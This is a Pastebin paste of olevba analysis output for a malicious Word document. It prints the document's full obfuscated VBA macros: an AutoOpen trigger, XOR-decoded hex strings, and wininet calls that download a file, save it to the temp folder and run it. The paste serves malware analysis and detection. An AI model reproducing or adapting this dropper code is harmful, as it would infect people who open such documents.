API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Apr 21st, 2015
573
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 14.44 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- I413136.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: I413136.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: I413136.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub RAMIRO(FELIX As Long)
  17. CONRAD
  18. End Sub
  19.  
  20. Sub autoopen()
  21. RAMIRO (124)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: I413136.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
  36.  
  37. Set TOMAS = CreateObject _
  38. (SHELDON _
  39. (WINSTON, TOMMIE))
  40. Dim BRETT As Integer
  41. BRETT = TOMAS.Open(OLIVER & HUGO)
  42. End Function
  43.  
  44. Public Function GILBERTO(ByRef ERICK As String, ByRef TRENT As Long) As Integer
  45. GILBERTO = Asc(WOODROW(44, ERICK, _
  46.         ((TRENT Mod SALVATORE(ERICK)) + 1), 1))
  47. End Function
  48.  
  49. Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
  50. FREDDIE = FREDDIE * 2
  51. LIONEL = SHELDON(TERRENCE, ENRIQUE)
  52.    
  53. End Function
  54.  
  55. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  56. ANALYSIS:
  57. +------------+--------------+--------------------------+
  58. | Type       | Keyword      | Description              |
  59. +------------+--------------+--------------------------+
  60. | Suspicious | CreateObject | May create an OLE object |
  61. | Suspicious | Open         | May open a file          |
  62. +------------+--------------+--------------------------+
  63. -------------------------------------------------------------------------------
  64. VBA MACRO CLAY.bas
  65. in file: I413136.doc - OLE stream: u'Macros/VBA/CLAY'
  66. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  67.  
  68.  
  69.  
  70. Public Function SHELDON(ERICK As String, REYNALDO As String) As String
  71.    
  72.     Dim JERALD As Integer
  73.     Dim EDMOND As Integer
  74.    
  75.    
  76.     Dim DARREL As Integer
  77. For DARREL = 77 To 78
  78. If DARREL = 70 Then End
  79. Next DARREL
  80.    
  81.     Dim TRENT As Long
  82.     Dim TERENCE As String
  83.     For TRENT = 1 _
  84.     To _
  85.     ( _
  86.     SALVATORE _
  87.     (REYNALDO) _
  88.     / 2)
  89.         JERALD = DEWAYNE(REYNALDO, TRENT)
  90.         EDMOND = GILBERTO(ERICK, TRENT)
  91.         TERENCE = TERENCE + EMANUEL(JERALD, EDMOND)
  92.     Next TRENT
  93.    SHELDON = TERENCE
  94. End Function
  95.  
  96. Public Function AUBREY(SANTIAGO As String)
  97. Dim ALONZO As Long
  98. ALONZO = 1
  99. ELIAS ALONZO * 2
  100. ALONZO = ALONZO + 4
  101. End Function
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. No suspicious keyword or IOC found.
  111. -------------------------------------------------------------------------------
  112. VBA MACRO ROLANDO.bas
  113. in file: I413136.doc - OLE stream: u'Macros/VBA/ROLANDO'
  114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  115.  
  116. Public Function SALVATORE(KRISTOPHER As String) As Long
  117. SALVATORE = Len(KRISTOPHER)
  118. End Function
  119.  
  120.  
  121. Public Function ELIAS(ERNESTO As Double)
  122.  
  123. Dim LIONEL As Object
  124.  
  125.  
  126.     Dim ROMAN As Long
  127. For ROMAN = 14 To 15
  128. ROMAN = ROMAN + 15
  129. Next ROMAN
  130.    
  131.  
  132. Dim ELLIS  As Object
  133.  
  134.  
  135. For ROMAN = 10 To 20
  136. ROMAN = ROMAN + 60
  137. Next ROMAN
  138.    
  139.  
  140. Set ELLIS = LAURENCE
  141. ROMAN = ROMAN + 5
  142. Dim LEWIS As Boolean
  143.  
  144. If ROMAN > ROMAN * 100 Then End
  145. LEWIS = ORVILLE(LIONEL, ELLIS)
  146. ERNESTO = ERNESTO + 4
  147. End Function
  148.  
  149.  
  150. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  151. ANALYSIS:
  152. No suspicious keyword or IOC found.
  153. -------------------------------------------------------------------------------
  154. VBA MACRO CORNELIUS.bas
  155. in file: I413136.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157.  
  158. Option Explicit
  159.  
  160. Sub DOMINGO(SANTOS As Double)
  161.  
  162. AUBREY ("ROYCE")
  163. End Sub
  164.  
  165. Public Function EMANUEL(ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
  166.     EMANUEL = Chr(JERALD Xor EDMOND)
  167. End Function
  168.  
  169. Public Function DEWAYNE(ByRef REYNALDO As String, ByRef TRENT As Long) As Integer
  170.  DEWAYNE = Val("&H" & (WOODROW(12, REYNALDO, MORGAN(TRENT), 2)))
  171. End Function
  172. Public Function MORGAN(ByRef TRENT As Long) As Long
  173.  MORGAN = (2 * TRENT) - 1
  174. End Function
  175.  
  176. Public Function LAURENCE() As Object
  177. Dim ISMAEL As String
  178. ISMAEL = SHELDON(WINSTON, DARRIN)
  179. Set LAURENCE = CreateObject(ISMAEL)
  180. End Function
  181.  
  182.  
  183.  
  184.  
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. ANALYSIS:
  187. +------------+--------------+-----------------------------------------+
  188. | Type       | Keyword      | Description                             |
  189. +------------+--------------+-----------------------------------------+
  190. | Suspicious | CreateObject | May create an OLE object                |
  191. | Suspicious | Chr          | May attempt to obfuscate specific       |
  192. |            |              | strings                                 |
  193. | Suspicious | Xor          | May attempt to obfuscate specific       |
  194. |            |              | strings                                 |
  195. +------------+--------------+-----------------------------------------+
  196. -------------------------------------------------------------------------------
  197. VBA MACRO LAMAR.bas
  198. in file: I413136.doc - OLE stream: u'Macros/VBA/LAMAR'
  199. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  200.  
  201.  
  202. Public Const SLIONEL = "JOHN"
  203.  
  204. #If VBA7 And Win64 Then
  205. Public _
  206. Declare _
  207. PtrSafe _
  208. Function _
  209. WILSON Lib _
  210. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  211. Public _
  212. Declare _
  213. PtrSafe _
  214. Function _
  215. GUSTAVO Lib _
  216. "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As LongPtr
  217. Public _
  218. Declare _
  219. PtrSafe _
  220. Function _
  221. SYLVESTER Lib _
  222. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  223. Public _
  224. Declare _
  225. PtrSafe _
  226. Function _
  227. ROOSEVELT Lib _
  228. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  229. #Else
  230. Public Declare Function WILSON Lib "wininet.dll" _
  231. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  232. Public Declare Function GUSTAVO Lib "wininet.dll" _
  233. Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As Long
  234. Public Declare Function SYLVESTER Lib "wininet.dll" _
  235. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  236. Public Declare Function ROOSEVELT Lib "wininet.dll" _
  237. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  238. #End If
  239.  
  240.  
  241. Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
  242.     WOODROW = Mid$(KRISTOPHER, JERALD, EDMOND)
  243.     SAMMY = SAMMY + 31
  244. End Function
  245. #If VBA7 _
  246.     And Win64 Then
  247. Public Function EFRAIN() As LongPtr
  248.  #Else
  249. Public Function EFRAIN() As Long
  250.  
  251.  #End If
  252.  
  253.  EFRAIN = GUSTAVO(STACYK, EMILIO, vbNullString, vbNullString, 0)
  254. End Function
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  262. ANALYSIS:
  263. +------------+----------------+-----------------------------------------+
  264. | Type       | Keyword        | Description                             |
  265. +------------+----------------+-----------------------------------------+
  266. | Suspicious | Lib            | May run code from a DLL                 |
  267. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  268. |            |                | may be used to obfuscate strings        |
  269. |            |                | (option --decode to see all)            |
  270. | IOC        | wininet.dll    | Executable file name                    |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO DEXTER.bas
  274. in file: I413136.doc - OLE stream: u'Macros/VBA/DEXTER'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276. Option Explicit
  277. Private Const BRENDAN = 6000
  278. Private Const STACYK As String = "COURTNEY"
  279. Private Const EMILIO = 1
  280. Private Const ELIJAH = &H4000000
  281.  
  282.  
  283. Public Function HUMBERTO(EMMANUEL As Long, ByVal STEPHAN As String) As Boolean
  284.     #If VBA7 And Win64 Then
  285.         Dim LOUIE As LongPtr, STERLING As LongPtr
  286.     #Else
  287.         Dim LOUIE As Long, STERLING As Long
  288.     #End If
  289.     Dim LAMONT As Long
  290.     Dim STACY As String * BRENDAN, GARLAND As String
  291.     Dim MILES As Integer, MICAH As Double
  292.     LOUIE = EFRAIN
  293.     If LOUIE = 0 Then
  294.         Exit Function
  295.     End If
  296.     Dim LUCAS As Boolean
  297.    
  298.     If BILLIE(STERLING, LOUIE) Then
  299.     End If
  300.     If STERLING = 0 Then
  301.         MICAH = 0
  302.     Else
  303.         SYLVESTER STERLING, STACY, BRENDAN, LAMONT
  304.         GARLAND = STACY
  305.           Dim LOGAN As Integer
  306.           LOGAN = 0
  307.           LOGAN = LOGAN + 33
  308. If LOGAN > LOGAN + 40 Then End
  309.         Do While LAMONT <> 0
  310.             SYLVESTER STERLING, STACY, BRENDAN, LAMONT
  311.                     GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
  312.         Loop
  313.              MICAH = SALVATORE(GARLAND): _
  314.              MILES = LOWELL("JERRY")
  315.         Open STEPHAN _
  316.             For Binary Access Write _
  317.         Lock Write _
  318.         As #MILES
  319.         Put #MILES, _
  320.                 , GARLAND
  321.         LOGAN = LOGAN + 62
  322.     If LOGAN < 0 Then End
  323.         Close #MILES
  324.     End If
  325.     WILSON STERLING
  326.     WILSON LOUIE
  327.     GARLAND = ""
  328.     If MICAH Then
  329.         HUMBERTO = True
  330.     End If
  331. End Function
  332.  
  333.  
  334. #If VBA7 And Win64 Then
  335.        Public Function BILLIE(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  336.     #Else
  337.        Public Function BILLIE(ByRef GRADY As Long, NOAH As Long) As Boolean
  338.     #End If
  339.         Dim PHIL As Double
  340. Dim GUADALUPE As String
  341. Dim CLARK As Long
  342.     GUADALUPE = LIONEL(893, WINSTON, TIMMY)
  343.  
  344. For PHIL = 14 To 15
  345. PHIL = PHIL + 5.5
  346. Next PHIL
  347.     GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
  348.     BILLIE = True
  349. End Function
  350.  
  351.  
  352. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  353. ANALYSIS:
  354. +------------+----------------+-----------------------------------------+
  355. | Type       | Keyword        | Description                             |
  356. +------------+----------------+-----------------------------------------+
  357. | Suspicious | Open           | May open a file                         |
  358. | Suspicious | Write          | May write to a file (if combined with   |
  359. |            |                | Open)                                   |
  360. | Suspicious | Put            | May write to a file (if combined with   |
  361. |            |                | Open)                                   |
  362. | Suspicious | Binary         | May read or write a binary file (if     |
  363. |            |                | combined with Open)                     |
  364. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  365. |            |                | may be used to obfuscate strings        |
  366. |            |                | (option --decode to see all)            |
  367. +------------+----------------+-----------------------------------------+
  368. -------------------------------------------------------------------------------
  369. VBA MACRO AMOS.bas
  370. in file: I413136.doc - OLE stream: u'Macros/VBA/AMOS'
  371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  372. Public Const TOMMIE = "123A2E29226A003C3C253C3029353B242B"
  373. Public Const RANDAL = "1D2222203C36247A622C2D36"
  374. Public Const TIMMY = "29263F35746B6E29382C273D21352B262A2C2D2D293F67363C256E607E6A7F707562293130"
  375. Public Const DARRIN = "1231392C3E3028222B67133A24240132363A212C032E2330303C"
  376. Public Const WINSTON = "HARKENDALLIUS"
  377.  
  378.  
  379. Public Sub CONRAD()
  380.         Dim BERT As Long
  381.  
  382.     Dim ELBERT As Long
  383. For ELBERT = 5 To 11
  384. ELBERT = ELBERT * 3
  385. Next ELBERT
  386.  
  387. DOMINGO (8.2)
  388.  
  389. End Sub
  390.  
  391.  
  392. Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
  393.  
  394. Dim DREW As Long
  395. Set OLIVER = IGNACIO(LAURENCE)
  396.  
  397. Dim JODY
  398.  
  399. Dim HUGO As String
  400. HUGO = LIONEL(2048, WINSTON, RANDAL)
  401.  
  402. For DREW = 144 To 145
  403. DREW = DREW * 3
  404. Next DREW
  405. JODY = OLIVER & HUGO
  406.  
  407.  
  408. If WILFRED(HOMER, JODY) Then
  409.  
  410. End If
  411. If HUMBERTO(589, JODY) Then
  412. End If
  413. If WILFRED(HOMER, JODY) Then
  414. End If
  415.  
  416.  
  417. ORVILLE = RICARDO(OLIVER, HUGO, 9)
  418.  
  419. End Function
  420. Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
  421. If JERMAINE.FileExists(FORREST) Then
  422. WILFRED = True
  423. Else
  424. WILFRED = False
  425. End If
  426. End Function
  427.  
  428. Public Function LOWELL(KRISTOPHER As String) As Integer
  429.     LOWELL = FreeFile
  430. End Function
  431.  
  432. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  433. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  434. End Function
  435.  
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. ANALYSIS:
  438. +------------+-------------+-----------------------------------------+
  439. | Type       | Keyword     | Description                             |
  440. +------------+-------------+-----------------------------------------+
  441. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  442. |            |             | be used to obfuscate strings (option    |
  443. |            |             | --decode to see all)                    |
  444. +------------+-------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!